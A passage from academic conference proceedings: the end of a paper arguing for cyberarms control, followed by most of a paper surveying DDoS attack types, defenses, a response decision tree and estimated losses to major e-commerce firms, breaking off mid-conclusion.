divergence can characterize the extent of difference between expected and observed traffic distributions.
How do we identify the political or social agenda to search for? This requires help from experts on
international relations. Nations have longstanding grievances with other nations, and particular issues
are more sensitive in some nations than others. We can enumerate many of them and identify
associated Internet sites.
We expect other properties of the observable network traffic to provide precursors to attack. Feature
selection methods in finding discriminating network traffic features (Beverly and Sollins 2008) provide a
start. Network-flow data may be sufficient for early warnings (Munz and Carle 2007). It will work well in
tracking and analyzing attacks supported by hacker groups, such as the Chinese hacker groups
(Hvinstendahl 2010) that are harnessed to attack Western organizations at times of political or social
grievances against them. We also can look for particular sequences of events indicative of a systematic
attack, say a broadcast of many footprinting packets followed by more specific footprinting, something not
seen much in criminal cyberattacks.
An additional tool useful in detecting cyberweapons development is a decoy, a site deliberately designed
to encourage attacks. A decoy can be designed to be more useful than a normal site by narrowing its
content to just that necessary to invoke a response. A decoy can also be equipped with more detailed
monitoring of its usage that would not be possible for most sites, and should use honeypot technology to
implement attack resilience and intelligence-gathering capabilities that are not easily disabled. Decoys
do not generally raise ethical concerns because they are passive, but guidelines should be followed in
their use (Rowe 2010 JTE) since decoys are used by phishers.
Data fusion on World Wide Web usage can complement our network monitoring. If a country's
government shows a sudden increase in visits to hacker Web sites, it may suggest cyberweapons
development.
3.3 Encouraging more-responsible cyberattacks
International agreements can stipulate the manner in which cyberwarfare can be conducted. Two
important aspects of this are attribution and reversibility of attacks. For attribution, a responsible country
will find it in their interests to make their attacks clear in origin to better enable desired political and social
effects of an attack, which are often more important than the actual military value. The ability to trace the
Georgia cyberattacks back to Russia without too much trouble suggests such an political effect was
224

Neil Rowe et al.
intended. Contrarily, it could be useful to a country to be able to prove it was not the source of a
cyberattack for which it is being blamed. Attribution can be done by digital signatures attached to attack
code or data that identify who is responsible for an attack and why. They could be concealed
steganographically (Wayner 2002) to avoid providing a clue to the victim that they are being attacked.
For attacks without code like denial of service, a signature can be encoded in the low-order bits of the
times of the attacks.
Nations should also be encouraged to use attack methods that are more easily repairable, following the
same logic behind the design of easily removable landmines. (Rowe 2010 ECIW) proposed four
techniques that can be used to make cyberattacks that are easier to reverse by the attacker than by the
victim even when the victim tries to restore from backup (Dorf and Johnson 2007). They are: (1)
encryption of key software and data by the attacker where the victim does not have the key to decrypt it;
(2) obfuscation of a victim's system by the attacker by data manipulations that are hard to understand yet
algorithmic and reversible; (3) withholding by the attacker of key information that is important to the
victim; and (4) deception by the attacker of the victim to make them think their systems are not
operational when they actually are. In the first two cases, reversal can be achieved by software
operations by the attacker; in the third case, the attacker can restore missing data; and in the fourth case,
the attacker can reveal the deception.
How do we encourage attackers to use reversible attacks? There are several incentives. One would be
if the attacker will eventually need to pay reparations, as the United Nations could stipulate as part of a
negotiated settlement of a conflict (Torpey 2006). Even in an invasion or regime change, it is likely that
the impacts of cyberweapons will need to be mitigated—indeed, the perceived possibility of mitigation will
likely drive the adoption of cyberweapons. Another incentive comes from international outcry at using
unethical methods and the resulting ostracism of the offending state, as with the use of biological
weapons. Another incentive is if a victim is likely to respond in like kind, wherein use of a reversible
attack could encourage an adversary to do the same because otherwise they would appear to be
escalating the conflict (Gardam 2004). Also, nonreversible attacks could be interpreted as violating the
laws of warfare in regard to unjustified force when reversible methods are easily available. Responses of
the international community to analogous such violations include sanctions, boycotts, fines, and legal
proceedings (Berman 2002).
3.4 Support for international cooperation
Global cybersecurity is hindered by a lack of cybersecurity action plans at the national level (Ghernouti-
Helie 2010). Reducing vulnerabilities and threats from cyber attack requires the policy community to
support norms of behavior among states, enforceable at the national level, to secure the "cyber
commons". The 2010 U.S. Quadrennial Defense Review advocates strengthening international
partnerships to secure the cyber domain using technical, legal and organizational cooperation, and a
recent U.S. GAO report (USGAO 2010) recommended that the U.S. "establish a coordinated approach
for the federal government in conducting international outreach to address cybersecurity issues
strategically."
Several international agreements dealing with cybercrime can serve as models for cyberarms control.
The Council of Europe Convention on Cybercrime, adopted in November 2001, seeks to align domestic
substantive and procedural laws for evidence gathering and prosecution, and to increase international
collaboration and to improve investigative capabilities for coordinating E.U. efforts on cyber crimes.
Adopted and ratified by the US in 2007, it is considered a model law for the rest of the world. The World
Summit on the Information Society Declaration of Principles endorsed a global culture of cybersecurity
that is promoted, developed, and implemented in cooperation with all stakeholders and international
expert bodies. The International Telecommunications Union (ITU) and U.N. General Assembly have also
passed several resolutions addressing the criminal misuse of information. The efforts of the ITU have
culminated in the International Multilateral Partnership against Cyber Threats (IMPACT) although the
United States does not currently support it. IMPACT is a Global Response Centre based in Cyberjaya,
Malaysia. It was set up in 2009 to serve as the international community’s main cyberthreat resource by
proactively tracking and defending against cyberthreats. The center's alert and response capabilities
include an Early Warning System that enables IMPACT members to identify and head off potential and
imminent attacks before they can inflict damage on national networks.
Many of the ideas mentioned here benefit from international cooperation (Yannakogeorgos 2010;
Yannakogeorgos 2011). An example is sharing of data collected from monitoring of the Internet
225

Neil Rowe et al.
(Erbschloe 2001). Data on just source address, destination address, and packet size is not very sensitive
or subject of privacy concerns, and should be useful to share even when traffic is encrypted. The
European Convention on Cybercrime makes a step in that direction. So that appears to be a good initial
focus for international agreements on sharing of data, and not just for cyberweapons tracking.
Other agreements could focus on mandating technology that will aid in managing a cyberweapons threat.
An example would be a mandate for countries to use IPv6 instead of IPv4 to enable better attribution of
events on the Internet; rogue states could be told that they cannot connect to the Internet unless they use
IPv6. Other mandates could stipulate architectures in which attribution of traffic is easier such as
minimum requirements on persistence of cached records. Other useful agreements could prohibit lesscontrollable
attacks such as worms and mutating viruses, to achieve better discrimination of military from
civilian targets in cyberattacks (Shulman 1999).
Criminal prosecution of a nation's hacker groups by its government could be an important stipulation of
agreements. For instance, when Philippine hackers in 2000 launched a virus that attacked computers
worldwide and the Philippine government was initially unhelpful, improvements under international
pressure were subsequently made by it, both legally and managerially, to enable a better response in the
future. Other possible agreements could follow those of traditional arms control, as for instance a
commitment to use cyberweapons only in self-defense, or agreed export controls on cyberweapons
technology. We do need to make legal distinctions between cybercrime, cyberconflict, cyberespionage
and cyberterror as this is necessary when creating a regulatory regime for cyberweapons (Wingfield
2009). One model that could be studied is the Wassenaar Arrangement for export controls, which could
be extended to information technology products.
4. Conclusion
Cyberarms agreements have been said to be impossible. But technology is changing that. We can seize
and analyze drives on which cyberweapons were developed; we can detect the necessary testing of
cyberweapons; we can create incentives for self-attributing and reversible cyberattacks; and we can
develop and ratify new kinds of international agreements. While we cannot stop cyberweapons
development, we may be able to control its more dangerous aspects much as we control chemical,
biological, and nuclear weapons, and limit it to responsible states. It is time to consider seriously the
possibility of cyberarms control.
The views expressed are those of the author and do not represent those of any part of the U.S. Government.
References
Berman P. (2002) "The Globalization of Jurisdiction," University of Pennsylvania Law Review, Vol. 151 No. 2, pp.
311-545.
Beverly, R., and Sollins, K. (2008) "An Internet Protocol Address Clustering Algorithm," USENIX SysML Workshop.
Brenner, S. (2010) Cybercrime: Criminal Threats from Cyberspace, Santa Barbara, CA, US: Praeger.
Clarke, R., and Knake, R. (2010) Cyberwar: The Next Threat to National Security and What To Do about It, New
York, US: HarperCollins.
Croft, S. (1996) Strategies of Arms Control: A History and Typology, Manchester, UK: Manchester University Press.
Dorf, J., and Johnson, M. (2007) "Restoration Component of Business Continuity Planning," in Tipton, H., and
Krause, M. (Eds.), Information Security Management Handbook, Sixth Edition, Boca Raton, FL, US: CRC
Press, pp. 1645-1654.
Erbschloe, R. (2001) Information Warfare: How to Survive Cyber Attacks, Berkeley, CA, US: Osborne/McGraw-Hill,
2001.
Gady, F.-S. (2010, March 24) "Africa's Cyber WMD," Foreign Policy.
Gardam, J. (2004) Necessity, Proportionality, and the Use of Force by States, Cambridge, UK: Cambridge University
Press.
Garfinkel, S. (2006, September) "Forensic Feature Extraction and Cross-Drive Analysis," Digital Investigation, Vol. 3,
Supplement 1, pp. 71-81.
Garfinkel, S., Roussev, V., Nelson, A., and White, D. (2010) "Using Purpose-Built Functions and Block Hashes to
Enable Small Block and Sub-File Forensics," DFRWS, Portland, OR.
Ghernouti-Helie, S. (2010) A National Strategy for an Effective Cybersecurity Approach and Culture, New York, US:
IEEE Press.
Johnson, P. (2002) "Is It Time for a Treaty on Information Warfare?" in Schmitt, M., and O'Donnell, B., Computer
Network Attack and International Law (International Law Studies Volume 76), pp. 439-455, Newport, RI, US:
Naval War College.
Hvistendahl, M. (2010, March 3) "China's Hacker Army," Foreign Policy.
226

Neil Rowe et al.
Libicki, M.(2007) Conquest in Cyberspace: National Security and Information Warfare, New York, US: Cambridge
University Press.
Malin, C., Casey, E., and Aquilina, J. (2008) Malware Forensics: Investigating and Analyzing Malicious Code,
Syngress.
Markoff, J. (2010, September 26) "A Silent Attack, But Not a Subtle One," New York Times, p. A6.
Mel, H., and Baker, D. (2000) Cryptography Decrypted, 5th edition, Boston, MA, US: Addison-Wesley Professional.
Munz, G., and Carle, G. (2007, May) "Real-Time Analysis of Flow Data for Network Attack Detection," Proc. 10th
IFIP/IEEE Intl. Symposium on Integrated Network Management, pp. 100-108.
O'Neill, P. (2010) Verification in an Age of Insecurity: The Future of Arms Control Compliance, New York, US:
Oxford.
Price, R. (1997) The Chemical Weapons Taboo, Ithaca, NY, US: Cornell University Press.
Rooney, B. (2011, February 4) "Calls for Geneva Convention in Cyberspace," Wall Street Journal.
Rowe, N. (2010) "The Ethics of Cyberweapons in Warfare," Journal of Technoethics, Vol. 1, No. 1, pp. 20-31 [JTE].
Rowe, N. (2010, July) "Towards Reversible Cyberattacks," Proc. 9th European Conference on Information Warfare
and Security, Thessaloniki, Greece [ECIW].
Rowe, N., and Garfinkel, S. (2010, May) "Global Analysis of Disk File Times," Fifth International Workshop on
Systematic Approaches to Digital Forensic Engineering, Oakland CA.
Rowe, N., and Goh, H. (2007, June) "Thwarting Cyber-Attack Reconnaissance with Inconsistency and Deception," 8 th
IEEE Information Assurance Workshop, West Point, NY, pp. 151-158.
Shulman, M. (1999) "Discrimination in the Laws of Information Warfare," Columbia Journal of Transnational Law, Vol.
37, pp. 939-968.
Torpey J. (2006) Making Whole What Has Been Smashed: On Reparations Politics, Cambridge, MA, US: Harvard
University Press.
Trost, R. (2010) Practical Intrusion Analysis, Upper Saddle River, NJ, US: Addison-Wesley.
United Nations (1991) Final Document: Third Review Conference of the Parties to the Convention on the Prohibition
of the Development, Production, and Stockpiling of Bacteriological (Biological) and Toxin Weapons and on
Their Destruction, BWC/DONF.II/23, Geneva, Switzerland.
USCCU (United States Cyber Consequences Unit) (2009, August) "Overview by the US-CCU of the Cyber Campaign
against Georgia in August of 2008," US-CCU Special Report, downloaded from www.usccu.org.
USGAO (United States Government Accountability Office) (2010, March 5) "Cybersecurity: Progress Made But
Challenges Remain in Defining and Coordinating the Comprehensive National Initiative," Washington, D.C., US:
Government Accountability Office.
Wayner, P. (2002) Disappearing Cryptography: Information Hiding: Steganography and Watermarking, San
Francisco, CA, US: Morgan Kaufmann.
Wingfield, T. (2009) "International Law and Information Operations," in Kramer, F., Starr, S., and Wentz, L. (Eds.),
Cyberpower and National Security, Washington DC: National Defense University Press, pp. 525-542.
Yannakogeorgos, P. (2010, October) "Cyberspace, The New Frontier - And the Same Old Multilateralism," in Reich,
S., Global Norms, American Sponsorship and the Emerging Patterns of World Politics. Houndsmills, UK:
Palgrave.
Yannakogeorgos, P. (2011) "Promises and Pitfalls of the U.S. National Strategy to Secure Cyberspace," Carlisle, PA,
US: Army War College.
227

Distributed Denial of Service Attacks as Threat Vectors to
Economic Infrastructure: Motives, Estimated Losses and
Defense Against the HTTP/1.1 GET and SYN Floods
Nightmares
Libor Sarga and Roman Jašek
Tomas Bata University in Zlin, Czech Republic
sarga@fame.utb.cz
jasek@fai.utb.cz
Abstract: With the number of nodes in the Internet's backbone networks rising exponentially the possibility of
emergence of entities exhibiting outwardly hostile intents has been steadily increasing. The cyberspace is fittingly
termed “the no man's land” because of an unprecedented growth pattern and lackluster control mechanisms.
Distributed Denial of Service (DDoS) attacks take advantage of the current situation and primarily aim at destabilizing
or severely limiting usability of infrastructure to the end-users in part or whole. A typical DDoS incursion exploiting
heterogeneous base of personal computers consists of two phases: insertion of predefined set of instructions into the
host systems via either self-propagating or non-reproducing malware and simultaneous execution of repeating
queries to a destination unit. Generally targeted and deployed to impede functionality of a single or multiple servers
with similar properties and utilizing substantial resources with little to no discernible selection criteria, DDoSes poses
a significant threat. Moreover, effective and efficient countermeasures require experience, precision, speed,
operational awareness, appropriate security protocols summarizing and alleviating potential consequences in case of
failure to contain as well as proactive detection algorithms in place. Global response instruments (batch filtering,
temporary IP address blacklisting) are only suitable for SYN floods, whereas during GET DDoS the same tools can't
be used due to presence of legitimate incoming requests. The article scrutinizes methodology and policies currently
in effect as a part of Critical Infrastructure Protection initiatives. The examination allows to outline procedural
decision-making trees in the event of a DDoS violation while maintaining predefined and consistent quality of service
level. Furthermore, rationale of perpetrators' motives to instigate the attacks are hypothesized with preferential focus
on economic infrastructure components. These hubs of virtualized economy are detailed and target selection
probabilities in tactical and strategic perspectives are identified based on known facts. Financial losses, worst case
scenarios and social repercussions following a successful intrusion are also investigated by means of inference from
successful DDoS insurgences.
Keywords: distributed denial of service, economic infrastructure, potential losses, distributed attacks, network
security, economic hubs, business continuity assurance, attack vectors analysis, botnet recruitment
1. Introduction
A DoS is a network-based incursion during which an agent intentionally saturates system resources by
means of increased network traffic otherwise utilized to handle legitimate inquiries (Carl et al 2006).
DDoS differs in that it is using many hijacked systems in a hierarchical structure controlled by a single
attacker (master) and represents coordinated effort aimed at destabilizing infrastructure elements (Garber
2000). Here, victim-side ingress packet flow consists of both genuine and spoofed requests. A scheme of
the attack is depicted below (Figure 1).
Non-existent nomenclature initially prompted some authors (Elliott 2000) to label the infected stations
“ants”, “zombies”, “slaves” (Nagesh & Sekaran) or “drones” (Holz 2005) but the term “bots” is the most
widely used. Despite known modus operandi (CERT 1997) recent cases proved effective and efficient
countermeasures are still yet to emerge.
The rest of the article is divided as follows: in the second part we describe various types of DDoS attacks
and defense mechanisms to maintain predefined Quality of Service (QoS) level. In the third part we
propose a decision-making tree formalizing steps to undertake in order to withstand the incoming data
flows while simultaneously maintaining (if possible) the affected unit fully operational and minimally
affected. The final part delimits significant economic centers, their estimated potential of handling
incoming requests and also details perpetrators’ motives in correlation with broader socio-economic
environment.
228

Libor Sarga and Roman Jašek
Figure 1: Scheme of a DDoS attack (Mirkovic et al 2004)
2. DDoS Attacks: Threat or annoyance?
“DoS attack: [Usenet,common; note that it's unrelated to DOS as name of an operating system]
Abbreviation for Denial-Of-Service attack. This abbreviation is most often used of attempts to shut down
newsgroups with floods of spam, or to flood network links with large amounts of traffic, or to flood network
links with large amounts of traffic, often by abusing network broadcast addresses.” (Raymond 2004)
While there may have been a perception shift in relation to the Anonymous initiative attacks (commercial
or national cyberspace incidents presently form the primary threat space of DoS), its definition still
provides sound basis for analysis.
A DoS attack utilizes only a single machine to distribute the payload. If no sophisticated obfuscation or
spoofing mechanism to hide attacker’s IP address is used the source is easily detectable. The method’s
usability hence quickly dissipated in favor DDoS.
However, even for a single machine operating on a fixed bandwidth it is possible to amplify outgoing
traffic by manipulating Domain Name System Security Extensions (DNSSEC) which emerged as a
reaction to lacking security (possibility of poisoning) of the original DNS used for domain name to IP
address translation. When an attacker sends a spoofed reply to its own query by forging or guessing a 16
bit (65,535 values) pseudorandom string and the malformed data are cached and stored for further
reference the DNS is said to have been poisoned. This may be countered by sending additional request
for the same DNS Resource Record (Trostle 2010) or by transferring to DNSSEC. Despite the latter’s
advantages it also exhibits the property of incoming UDP traffic amplification. During an experimental US
to Europe transfer the output was boosted 51 times in proportion to input (Bernstein 2010). Sending 10
Mbps can trigger 500 Mbps traffic, 200 Mbps results in 10 Gbps flood.
2.1 Dissecting a DDoS…
There are several patterns associated to DDoS each of which exploits different standardized behavior of
the target server based on known communication protocol routines.
229

2.1.1 Smurf / ICMP
Libor Sarga and Roman Jašek
The perpetrator floods the network with ping response messages from a wide array of sites by redirecting
packets to the target (IBM 2000), often amplifying the attack by sending larger packets (Zargar & Kabiri
2009) or using broadcast domains in the process. If a domain with 65,356 stations is used, 56 kbps dialup
modem could generate a maximum bandwidth of 3.66 Gbps (Kumar 2007).
ICMP attacks follows the same vector save for the amplification, making them less effective compared to
Smurf attacks.
Both types require misconfigured routers and assistance of mutually independent stations.
2.1.2 TCP SYN / UDP
The procedure for establishing connection between two parties using a HTTP protocol is called a three
way handshake (Postel 1981). DDoS modifies the sequence by not sending the final packet after
receiving confirmation from the server that it is ready for connection, leaving an unused open slot (Eddy
2007).
SYN flood aims at depleting resources via unfinished, half-open requests. The server capacity being
limited, it is possible for the effort to be successful if enough bots are simultaneously employed. After the
discovery, description (Bennahum 1994) and subsequent abuse the Computer Emergency Response
Team (CERT) released its first advisory on the matter (CERT 1996).
The UDP version utilizes UDP instead of TCP packets which don’t require a three way handshake to
initiate a session, instead sending a high volume of packets to target’s random ports (IANA 2010).
2.1.3 HTTP GET
The HTTP GET extends TCP SYN. The connection is finalized and established with the request passed
on as legitimate (MacVittie 2008). The attacker now has access to low-level functions, such as GET
command used to “retrieve whatever information (in the form of an entity) is identified by the Request-URI
(Fielding et al 1999).” A large number of entities is thus requested, slowing down the server.
2.1.4 Common patterns
Probability of the incursion’s success scale according to the number of machines used as mediators, and
whether additional factors, speed of the attack and automation in particular, are introduced (Householder
2002). Apart from Smurf and ICMP attacks which don’t require hijacked arrays of stations all other types
peruse them. Such array is called botnet and usually forms clusters with whole subnets infected by a
suitable propagation carrier like malware.
Attacks exploit standardized network behavior and response mechanisms. Instigators are aware broader
deployment of changes to the existing protocols and infrastructure is a long-term process requiring broad
consensus and considerable resources. This assures strategic continuity of their operations.
Fundamental properties, features and patterns remain largely unchanged over time with the only
variables being network utilization, number of controlled nodes and target selection. As the incursions
need to abide by the same protocols they exploit, new forms of DDoS may emerge only within their
confines. Recently, CXPST attack (Coordinated Cross Plane Session Termination) was proposed which
cripples routers from making proper packet switching decisions (Schuchard et al. 2011).
2.2 And how to defend against it
DoS attacks have since their discovery been documented and comprehensively treated (Mirkovic et al
2004) albeit security measures are still falling short. If the attacker has sufficient resources at their
disposal the probability the victim’s site will be forced to go offline is substantial. Coordinated efforts to
contain DDoS have begun to materialize only recently as a threat response.
One of the initiatives are honeypots which redirect incoming threats into an environment isolated from the
rest of the network where they may be analyzed for information that identifies the attacker, how to defend
against and defeat the intruder when their identity isn’t known and no a priori knowledge is available
230

Libor Sarga and Roman Jašek
about how they operate or their motives (Artail 2006). A disadvantage is that if the perpetrator realizes
the code is contained within honeypot, they leave immediately and choose different approach vector
(Raynal et al 2004). An arrangement addressing the issue was devised which uses multiple randomly
chosen servers to act as roaming honeypots for the detection to be more difficult (Khattab et al 2003).
The solution allows to study malware propagation patterns which may hamper formation of botnets, thus
lowering the risk of a DDoS.
It is possible to stop Smurf / ICMP attacks by configuring routers to deny directed broadcast packets
forwarding (IBM 2000), a functionality seldom used outside the scope of exploiting. Victim side, the
solution is to either contact an ISP for temporary traffic blocking or notify the owners of the amplifying
machines (CERT 1998).
The TCP SYN / UDP directly interact with the victim’s network and initiates a hostage situation where
“innocent” requests may be caught in the “crossfire”. One proposed solution is to use SYN cookies
(Bernstein & Schenk 1996) which associates a random string to every attempted connection. When the
modified handshake packet containing spoofed or otherwise obfuscated IP address returns and doesn’t
match the sequence, it is discarded. The concept hasn’t yet been widely implemented.
HTTP GET remains the most difficult to properly address. The ultimate purpose of the connection
becomes apparent only after GET requests have been made and therefore it has to be initially handled
as a genuine one. In this case administrators can’t globally batch filter or blacklist any IP address as this
may thwart intended functionality for “hostage” requests. One solution is to migrate to the parallel
computing environment such as cloud, defined as “a large pool of easily usable and accessible virtualized
resources [which]… can be dynamically reconfigured to adjust to a variable load (scale), allowing also for
an optimum resource utilization (Vaquero 2009)”. Security in such shared space is currently a matter
concern and research, the resources for handling elevated number of requests may guarantee target’s
on-line business operations continuity, though. Cloud architecture doesn’t in any way mitigate DDoS but
instead adds more resources to the victim’s infrastructure capabilities. As the attack may last
uninterrupted for several hours or days lease costs and other expenses have to be factored in. Despite
cloud itself being vulnerable to DDoS (Bakshi & Yogesh 2010) its scalability ensures the attacker has to
control a comparatively larger botnet than they had to in case of attempts at a single server.
Another solution is to redirect incoming traffic to a block of unallocated IP range (Mirkovic et al 2004) but
this presupposes forged or otherwise spoofed source addresses embedded in the packets, just as SYN
cookies. Backscatter traceback may be also used which traces flood traffic back to its network ingress
points.
3. Decision-making tree in case of the attack
The following tree (Figure 2) summarizes measures to be taken into account during a DDoS attack.
A sudden traffic surge may be explained by factors such as marketing campaigns, affiliate system, media
headlines appearance, new product introduction etc. Q1 addresses this by explicitly querying whether the
network activity is attributable to DDoS. As the increased bandwidth might be also an opportunity for the
perpetrator to mask the initial phase of the attack, any anomalies should be monitored as to the duration
and volume regardless.
After determining what type of DDoS is being deployed countermeasures are outlined as described
above. Infrastructure specifications (server capacity, stress tests results) are rarely released publicly so it
is entirely possible the servers may withstand the attack without compromising QoS (Q2).
The DDoS threat should be mitigated as soon as possible. All precautions apart from blacklisting suffers
time lags to administer and deploy, so Q3 and Q5 includes time as a factor when monitoring bandwidth
usage fluctuations for changes.
Employing spare resources (Q4) may help to alleviate the consequences but the only guaranteed
countermeasure is for the victim’s server to be capable of handling the network flood, in worst case
scenario for days on end without interruptions. Migrating to a scalable cloud or grid environment may help
to achieve this goal.
A feedback loop ensures only optimum amount of additional elements (owned or leased) is used.
231

Figure 2: Procedural decision-making tree
Libor Sarga and Roman Jašek
4. Where, why and what happens when the attacks happen?
As economy is one of the disciplines heavily utilizing information technology, concerns have been raising
regarding security, overdependence on and volatility of infrastructure as a primary business operations
platform. Despite the Internet’s enormous expansion the economic hubs through putting significant cash
flows remain largely unchanged.
4.1 Where?
A new entrant to the ecosystem of electronic commerce is Facebook. Because of its widespread use by
general public it was identified as a security threat by independent sources, documented by practices
such as frequent privacy policies changes, collecting, sharing and manipulation with personal information
as well as the attackers’ ability to distribute malicious code more quickly via the system (Fan & Yeung
2010).
Amazon.com is a multinational electronic commerce company, the biggest online retailer in the US and
also considered a major economic hub. It was chosen as an Anonymous cyber initiative target due to it
hosting a WikiLeaks mirror before deciding to drop the support.
The third corporation is eBay with its PayPal subsidiary.
Not only financial entities are considered significant for online commerce, however. Google generates
revenue from targeted advertising and affiliate marketing as well as preferential treatment of clients when
search algorithms detect keywords in a search string.
Two categories are not included: financial markets’ frontends and national symbols. While the former
(represented by New York, London, and Tokyo Stock Exchanges or NASDAQ Stock Market) focus
primarily on handling large sums of capital, the Internet functions solely as a medium of information
exchange (external network), not the facilitator of buys and sells (internal isolated network). The
232

Libor Sarga and Roman Jašek
interlopers would need to physically penetrate data centers or otherwise gain access to the inner network
prior to launching the attack. Given the security precautions in these facilities the scenario’s probability
and plausibility is only marginal. Electronic assaults of national symbols (government portals, cultural
heritage, major religious groups) wouldn’t as much generate substantial economic losses as may hinder
the trust of citizens in nation’s capabilities to protect the national cyberspace. Such attacks shouldn’t
therefore be deprioritized as to the effect they may have on the public’s opinion.
4.1.1 Estimated Losses
The entities forming a substantial part of virtual economy are summarized in a table below (Table 1). All
the sites occupy the Alexa Top 500 and Fortune 500 positions which measures number of unique visitors
and ranks US companies according to gross revenues, respectively. Direct estimated losses are
calculated from 2009 net income (where corresponding data were unavailable, revenue was used
instead). A year is converted to hours (365.25*24=8,766 hours) and the profit (revenue) divided by the
constant, resulting in the arithmetic mean of net income (revenue) per hour.
Table 1: Significant commercial entities and estimated losses
Name
Net Income /
Revenue* [mil. USD]
1 hour
Direct estimated losses
for time offline [USD]
8 hours 24 hours 48 hours
DDoS
target?
Tool
used
Amazon.com 902 102,898 823,180 2,469,541 4,939,083 Yes LOIC
eBay 2,389.1 272,542 2,180,333 6,540,999 13,081,999 No —
Facebook* 700 (est.) 79,854 638,832 1,946,496 3,832,991 No —
Google 6,520.45 743,834 5,950,673 17,852,019 35,704,038 No —
MasterCard 1,462.53 166,841 1,334,730 4,004,189 8,008,378 Yes LOIC
PayPal* 2,230 254,392 2,035,136 6,105,407 12,210,815 Yes LOIC
Visa 2,966 338,353 2,706,822 8,120,465 16,240,931 Yes LOIC
Yahoo 597.99 68,217 545,736 1,637,207 3,274,415 Yes ?
Total 2,026,931 16,215,442 49,676,323 97,292,650
The results don’t represent actual losses as the values are mathematically inferred under the assumption
every hour a year a constant number of transactions is carried out. They are also inert to any indirect
losses.
Five of the eight hubs have been targeted by DDoS attacks so far. Four of them were chosen as a part of
the Anonymous initiative utilizing Low Orbit Ion Cannon (LOIC), a modified version of open source
network stress testing application which offers no IP address obfuscation mechanism, allowing traceback
(Pras et al 2010). Websites of Visa and MasterCard were inaccessible for varying periods of time along
with two of three PayPal subdomains. Amazon.com managed to handle incoming traffic due to excess
capacities employed before the Christmas shopping period. Yahoo was inaccessible for the period of
three hours.
The results, despite being a crude measure, demonstrates what impact would a blackout of a mere hour
had with more than two million estimated direct costs provided all the sites were taken offline
simultaneously.
4.1.2 Infrastructure capacities
Virtual economy is vulnerable to DDoS attacks and the time for a broader industry and expert discussion
regarding the elevation of security policies not only on hardware/software level but primarily as a
proactive measure is necessary. Servers forming the basis of the economy may be overloaded in a
matter of minutes if spare resources are not employed.
It is known Amazon.com offers robust cloud computing services as part of their highly scalable Amazon
Elastic Compute Cloud (EC2) utilized by the company itself.
Facebook is running a platform consisting of 800 servers capable of handling 200,000 UDP requests per
second.
233

Libor Sarga and Roman Jašek
eBay servers spans 600 production instances in more than 100 server clusters, handling a billion page
views a day. Assuming every page view is equal to a connection request, the arithmetic mean produces
11,575 requests a second.
No reliable data source exists to estimate PayPal’s server capacity, but since it is a subsidiary of eBay,
infrastructure resources are likely shared between the two sites.
Google considers its server clusters parameters to be sensitive data and provide no specific information.
Visa operates its own Virtual Private Network (VPN) and handles 2.5 million transactions per hour.
Nevertheless, as the infrastructure wasn’t able to accommodate estimated 5,000–9,000 connections
generated by the members of Anonymous, not every transaction requires an active connection.
MasterCard servers handle more than 5.4 million transactions per day. The same as in case of Visa
applies, though, as it wasn’t able to handle the group’s generated continuous stream of requests.
4.2 Why and what?
Assessing the motives of the interlopers requires acceptance of uncertainty since proper scientific
research is precluded. Attackers either go to great lengths to obfuscate their identities or declare their
agendas only collectively in general statements.
4.2.1 Motives
As the DDoS attacks came into broader media and public focus in relation to the Anonymous initiative,
the group itself may provide some insight as to the purpose of their actions. The primary motive of the
Operation: Payback, instigated and so titled by this loose collective of individuals, was to retaliate against
companies which refused to raise further payments (PayPal, Visa, MasterCard), denied use of their
infrastructure and services (Amazon.com’s EC2 and cessation of selling of an electronic book containing
the first 5,000 cables) to WikiLeaks as it released confidential US military and diplomatic cables. In the
December 10, 2010’s press release the group assures it didn’t seek to assail any critical infrastructure but
only to raise awareness, calling its activities a legitimate expression of dissent. It also states the attempt
on Amazon.com servers never occurred which contradicts the outage of company’s several European
subdomains on December 26, 2010 as well as media coverage of attempts to disrupt the service on
December 9, 2010.
Other interests aren’t readily available and may be only hypothesized about. On national level,
stimulation of social repercussions and general opinion disintegration, especially when treated by the
media, may be considered. However, inability to protect national interests in cyberspace may lead to
increased pressure to administer measures mitigating the consequences, leading to overall net positive
effects. United States Cyber Command (USCYBERCOM), Naval Network Warfare Command
(NETWARCOM), Japanese Cyber Clean Center, European Security Technology Assessment Unit, and
Chinese People’s Liberation Army (PLA)’s electronic warfare department (“Information Security Base”)
were created to defend cyberspace territories of the respective states and to prevent future breaches.
On economic level loss of consumer loyalty, causing indirect financial losses and a shift in customers’
preferences, investors’ withdrawal, cash flows decrease, additional costs of security and information
technology audits, infrastructure resources expansion and public relations costs in a strategic perspective
aren’t farfetched. Short-term effects are affected by the season during which the attack is commenced
with the most substantial losses generated before the end of the year. As documented by Amazon.com,
additional resources lowering the risk of DDoS are integrated during these periods.
4.2.2 Social repercussions
The Internet as a rapidly evolving medium is distrusted when used as a facilitator of financial
transactions, especially in contrast to conservative paradigms many “traditional” institutions are based on.
The situation is worsened by a gap between professionals’ and end-users’ knowledge of technology
trends, protocols and threats. This deficit is exploited by the media when informing about computer
security-related incidents.
234

Libor Sarga and Roman Jašek
In a strategic perspective, DDoS may lead to a detriment in subjective notion of personal information’s
safety. With the main source of news for general public being the media and the complex phenomena of
network and data security requiring long-term study, misinformation is the logical result.
As commercial economic hubs are the primary targets, increase in the number of incursions may either
lead to buyers choosing local, smaller-scale companies or limiting the number of purchases on the
Internet altogether, preferring offline shopping. Proper, unbiased and technically accessible online
training course or a manual describing the underlying terminology in simple terms and assuring the
financial and personal data are safe during a DDoS attack, is required.
The second major concern is the public’s reaction in case electronic banking servers would stop
functioning which might have serious consequences as remote account management is a crucial part of
services offered by banks. Not only would the situation require immediate attention of law enforcement
agencies but also acting on behalf of the legislative branch as laws governing loss of profits, unforeseen
costs, and enforceable contracts’ fulfillments in this area remain vague. Would the costs have to be
redressed by the institutions which failed to protect interests of its clients through insufficient architecture
stress testing against such attempts, or the attackers? And if the perpetrators are apprehended, will they
be prosecuted under the law of countries of residence, the law of the affected country, or international
law? Until answers to these questions are provided and clearly communicated to the Internet users, it
remains a “no man’s land”, an unregulated grey zone.
The last concern is tied to increase in racial sentiments. As the attackers’ identities remain unknown,
various theories regarding their nationalities are offered. The largest botnet operator is claimed to be
operating from Russian Federation while redirection of 15 % of Internet traffic through China in 2010
allegedly caused by faulty addresses in DNS servers’ databases spawned claims of purposeful
misconfiguration in order to obtain large amount of traffic data for analyses. Dissemination of such
information without scientific, hard data-based research and conclusive evidence may lead to distrust of
ethnic diversity and inclusion, cultural convergence as well as social interactions the Internet is
applauded for.
5. In conclusion
The challenge of containing DDoS attacks lies in the hostage situation they initiate. Global filtering
mechanisms remain ineffective due to presence of legitimate requests. Several solutions were presented
